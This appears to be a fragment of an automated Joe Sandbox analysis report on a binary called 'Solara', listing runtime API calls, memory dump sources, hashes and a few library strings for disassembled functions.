                                                                                                                                      • Opcode Fuzzy Hash: eecc62935e6a061e89d485c53a05ba0ef9d187139d393a87ca8557f25b9a7c78
                                                                                                                                      • Instruction Fuzzy Hash: B901D671A10A69FFCB118F80EC0DBEEB7FCFB45B15F004926F811A2290DB749950CA90
                                                                                                                                      APIs
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0021D76F
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0021D838
                                                                                                                                      • __freea.LIBCMT ref: 0021D89F
                                                                                                                                        • Part of subcall function 0021BF11: HeapAlloc.KERNEL32(00000000,00000018,00000000,?,0020A67D,00000018,?,00203D4A,00000018,00000000), ref: 0021BF43
                                                                                                                                      • __freea.LIBCMT ref: 0021D8B2
                                                                                                                                      • __freea.LIBCMT ref: 0021D8BF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1096550386-0
                                                                                                                                      • Opcode ID: 9f61c0fa2ea2d87477de42d47cf52f4101b36eb9677b8d9aa9731eb09c270b3a
                                                                                                                                      • Instruction ID: c1e3ef8d69ebac00a9042a03474270fe4ed3aee1fa61d3d2c2f81492c3794b00
                                                                                                                                      • Opcode Fuzzy Hash: 9f61c0fa2ea2d87477de42d47cf52f4101b36eb9677b8d9aa9731eb09c270b3a
                                                                                                                                      • Instruction Fuzzy Hash: F2518372620206EFEB315F61DC81EFB76E9EF64710B160129FD04D6251E770DCB29AA0
                                                                                                                                      APIs
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0020F005
                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(00208E38), ref: 0020F024
                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(00208E38,0020A2F0,?), ref: 0020F052
                                                                                                                                      • TryAcquireSRWLockExclusive.KERNEL32(00208E38,0020A2F0,?), ref: 0020F0AD
                                                                                                                                      • TryAcquireSRWLockExclusive.KERNEL32(00208E38,0020A2F0,?), ref: 0020F0C4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 66001078-0
                                                                                                                                      • Opcode ID: 8ef4c298b2b527953ad9dcfdf5a3abd76ee9e34f257ed26a4b19ecbd511c38a6
                                                                                                                                      • Instruction ID: 9b45573cd7f250cf696eada606fbaa82da71b0856acbc0b51826c91dbe80b076
                                                                                                                                      • Opcode Fuzzy Hash: 8ef4c298b2b527953ad9dcfdf5a3abd76ee9e34f257ed26a4b19ecbd511c38a6
                                                                                                                                      • Instruction Fuzzy Hash: EF4158316A070ADBCB70CF64C68496AB3BAFF04310B10493AE446D7D87E770E9A5CB51
                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog3.LIBCMT ref: 0020D4C9
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0020D4D3
                                                                                                                                      • int.LIBCPMT ref: 0020D4EA
                                                                                                                                        • Part of subcall function 0020C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 0020C1F6
                                                                                                                                        • Part of subcall function 0020C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 0020C210
                                                                                                                                      • codecvt.LIBCPMT ref: 0020D50D
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0020D544
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3716348337-0
                                                                                                                                      • Opcode ID: 3af03408a02d9f1d05efdfda6de35e73724102a56b2a33c0ad9164f8f05249bd
                                                                                                                                      • Instruction ID: 8138ca5cc6a6b4df97914b4a5285effe1490a4150fcfaba84754b75c7e144869
                                                                                                                                      • Opcode Fuzzy Hash: 3af03408a02d9f1d05efdfda6de35e73724102a56b2a33c0ad9164f8f05249bd
                                                                                                                                      • Instruction Fuzzy Hash: CD01C4759203159FCB01EBA8D915AAE7BB5AF84328F640109E815AB2D3CF749E20CF81
                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog3.LIBCMT ref: 0020ADDE
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0020ADE9
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0020AE57
                                                                                                                                        • Part of subcall function 0020ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0020ACC2
                                                                                                                                      • std::locale::_Setgloballocale.LIBCPMT ref: 0020AE04
                                                                                                                                      • _Yarn.LIBCPMT ref: 0020AE1A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1088826258-0
                                                                                                                                      • Opcode ID: 620fa9040b9276567011bfa0be59fe310eeded834746d456510fca4fb7c6b391
                                                                                                                                      • Instruction ID: 5d9112af1b8ab3ec4d0027768f2bafe854ebe4d263dea1682f2eae7adb55a4ee
                                                                                                                                      • Opcode Fuzzy Hash: 620fa9040b9276567011bfa0be59fe310eeded834746d456510fca4fb7c6b391
                                                                                                                                      • Instruction Fuzzy Hash: FF017C75A203219BCB06EF20E95957D77B5FF88750B55401AE802673D2CF386E62CF82
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strlen
                                                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                      • API String ID: 4218353326-1866435925
                                                                                                                                      • Opcode ID: 7dafe65954eaa3124943e4e5382250efa8de0d4ab4231c8ac82ae34d08415772
                                                                                                                                      • Instruction ID: c50a9525ffeb7084991e2d9a3a39fd97a64b551725d1666c4409f51ea7a11a5b
                                                                                                                                      • Opcode Fuzzy Hash: 7dafe65954eaa3124943e4e5382250efa8de0d4ab4231c8ac82ae34d08415772
                                                                                                                                      • Instruction Fuzzy Hash: 11F16C75A102198FCB14CF68C494BADB7F1FF88324F198269E815AB3E2D774AD51CB90
                                                                                                                                      APIs
                                                                                                                                      • Concurrency::details::_Release_chore.LIBCPMT ref: 00207526
                                                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00207561
                                                                                                                                        • Part of subcall function 0020AF37: CreateThreadpoolWork.KERNEL32(0020B060,00208A2A,00000000), ref: 0020AF46
                                                                                                                                        • Part of subcall function 0020AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 0020AF53
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
                                                                                                                                      • String ID: Fail to schedule the chore!$G.#
                                                                                                                                      • API String ID: 3683891980-2059570399
                                                                                                                                      • Opcode ID: e4080fdad0945efe432055ad5369d10c8e6e2a3ac50719bcb85f4f8f9782411a
                                                                                                                                      • Instruction ID: 493fcf0de77eaeab6c1758622b5943bb18d10563ff71158978a76ac0c896fd17
                                                                                                                                      • Opcode Fuzzy Hash: e4080fdad0945efe432055ad5369d10c8e6e2a3ac50719bcb85f4f8f9782411a
                                                                                                                                      • Instruction Fuzzy Hash: 93519CB1D103199FCB00DF94E849BAEBBB4FF08314F144129E8196B392D776A925CF91
                                                                                                                                      APIs
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00203EC6
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00204002
                                                                                                                                        • Part of subcall function 0020ABC5: _Yarn.LIBCPMT ref: 0020ABE5
                                                                                                                                        • Part of subcall function 0020ABC5: _Yarn.LIBCPMT ref: 0020AC09
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                                                      • String ID: bad locale name$|= e.#
                                                                                                                                      • API String ID: 2070049627-665319736
                                                                                                                                      • Opcode ID: cb4c5e7046faf8985872dc9f03bf8365bce99bea033944c043e9bf6482cceec0
                                                                                                                                      • Instruction ID: ae264520061c2b4a7a896aa5205b0e3b7210e73b1c667fa8627481c9a62acc35
                                                                                                                                      • Opcode Fuzzy Hash: cb4c5e7046faf8985872dc9f03bf8365bce99bea033944c043e9bf6482cceec0
                                                                                                                                      • Instruction Fuzzy Hash: C241A1F0A107469BEB10DF69C819B57BBF8BF04714F044229E40997B81E37AE568CBE1
                                                                                                                                      APIs
                                                                                                                                      • std::_Ref_count_base::_Decref.LIBCPMT ref: 0020B809
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DecrefRef_count_base::_std::_
                                                                                                                                      • String ID: MOC$RCC$csm
                                                                                                                                      • API String ID: 1456557076-2671469338
                                                                                                                                      • Opcode ID: 393ce3586057cb113479fc6e71392466c747ee493bbb858658075db6c8fee62a
                                                                                                                                      • Instruction ID: 1860e45d34eb0c3a1ef8ab83d7ca2ad9be6ee4e8b28ca59ea8234de0b26b5407
                                                                                                                                      • Opcode Fuzzy Hash: 393ce3586057cb113479fc6e71392466c747ee493bbb858658075db6c8fee62a
                                                                                                                                      • Instruction Fuzzy Hash: 5221F532920706DFDF369F54C855A79B3ACEF40720F14851EE411876E2DB38AEA1CE80
                                                                                                                                      APIs
                                                                                                                                      • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,0020253A,?,?,00000000), ref: 0020F129
                                                                                                                                      • GetExitCodeThread.KERNEL32(?,00000000,?,?,0020253A,?,?,00000000), ref: 0020F142
                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,0020253A,?,?,00000000), ref: 0020F154
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseCodeExitHandleObjectSingleThreadWait
                                                                                                                                      • String ID: :%
                                                                                                                                      • API String ID: 2551024706-86002043
                                                                                                                                      • Opcode ID: 1ec7ce4c30050453981ade5a1dbf435740d08307aef0bb95f76d09a220bfdd6a
                                                                                                                                      • Instruction ID: b348fc3a6310e5d0119820c476a28190679a889c634ced3a10dc1ea1668e4b3b
                                                                                                                                      • Opcode Fuzzy Hash: 1ec7ce4c30050453981ade5a1dbf435740d08307aef0bb95f76d09a220bfdd6a
                                                                                                                                      • Instruction Fuzzy Hash: CDF08231694219FFDF218F24ED0DB9A7B68EB01B70F244720F825EA1E0E731DE518680
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Yarn
                                                                                                                                      • String ID: e.#$|= e.#
                                                                                                                                      • API String ID: 1767336200-2959337839
                                                                                                                                      • Opcode ID: d5ca90554715e9e1c45b21997ea87e9007dbf4e6b1b09f3f5bc2306a4e157aaf
                                                                                                                                      • Instruction ID: 9362ae76a54497c4611eecbf673d89a03653722d8a16f569252d03a8db352167
                                                                                                                                      • Opcode Fuzzy Hash: d5ca90554715e9e1c45b21997ea87e9007dbf4e6b1b09f3f5bc2306a4e157aaf
                                                                                                                                      • Instruction Fuzzy Hash: A2E06D723283006FFB0CBA65AC62BBA73DCCF04B61F10002EF91A8A5C2ED10BD544A55
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,002269DC,00000000,?,0023D2B0,?,?,?,00226913,00000004,InitializeCriticalSectionEx,00230D34,00230D3C), ref: 0022694D
                                                                                                                                      • GetLastError.KERNEL32(?,002269DC,00000000,?,0023D2B0,?,?,?,00226913,00000004,InitializeCriticalSectionEx,00230D34,00230D3C,00000000,?,0021BBBC), ref: 00226957
                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0022697F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                      • String ID: api-ms-
                                                                                                                                      • API String ID: 3177248105-2084034818
                                                                                                                                      • Opcode ID: 24e2e4963285345f79f92d8042a3cb211a45ab6ae7a13ef5c807a2719b9def51
                                                                                                                                      • Instruction ID: b981261da9a75d92c35e41ecf9f10890a947f056c6354fb8c5a4ca9436b23e6b
                                                                                                                                      • Opcode Fuzzy Hash: 24e2e4963285345f79f92d8042a3cb211a45ab6ae7a13ef5c807a2719b9def51
                                                                                                                                      • Instruction Fuzzy Hash: C9E01A713A0219BBEF211FA0FC4EB6C3A59AB50B91F548420F94CA84E1DF72ECA09944
                                                                                                                                      APIs
                                                                                                                                      • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00224001
                                                                                                                                        • Part of subcall function 0021C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0021D895,?,00000000,-00000008), ref: 0021C082
                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00224253
                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00224299
                                                                                                                                      • GetLastError.KERNEL32 ref: 0022433C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2112829910-0
                                                                                                                                      • Opcode ID: c34052555d5c8e8a72d4a3eaf0f7f51d44e96a4ec98f24f5543f74e95478ad54
                                                                                                                                      • Instruction ID: 19997a14538c4de0858a979c975deb6978a0a57f4ffe9972e2e2eb77d4d0fc40
                                                                                                                                      • Opcode Fuzzy Hash: c34052555d5c8e8a72d4a3eaf0f7f51d44e96a4ec98f24f5543f74e95478ad54
                                                                                                                                      • Instruction Fuzzy Hash: 07D19A75D10268AFCF05DFE8E880AEDBBB9FF08314F24416AE915EB251D630A961CF50
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                      • Opcode ID: ef1f07c1ec7de01082e8cda8945153ee669e659c16c6db0beb6ff04263491f5e
                                                                                                                                      • Instruction ID: 3b40f7e05db38dc84b1720b0900b7cb61605440474375b1ebe885c9ac190a288
                                                                                                                                      • Opcode Fuzzy Hash: ef1f07c1ec7de01082e8cda8945153ee669e659c16c6db0beb6ff04263491f5e
                                                                                                                                      • Instruction Fuzzy Hash: CC51D271A206069FEB2A9F60C995BEA73F4EF20710F14406DEC2686291D771ECF0CB90
                                                                                                                                      APIs
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 002072C5
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00207395
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 002073A3
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 002073B1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2261580123-0
                                                                                                                                      • Opcode ID: 1e7986c926b914f8dba4bd5c86be6708f89d8f939a81e02059444ff17b03d047
                                                                                                                                      • Instruction ID: 6932ddfa13a3a226d77253f0ceb00fc9493603c2a466cdff85a35e247c48afba
                                                                                                                                      • Opcode Fuzzy Hash: 1e7986c926b914f8dba4bd5c86be6708f89d8f939a81e02059444ff17b03d047
                                                                                                                                      • Instruction Fuzzy Hash: E74104B0D143068BEB20DF24C84576EB7A9BF44320F144679D816476D3EB30F864CB91
                                                                                                                                      APIs
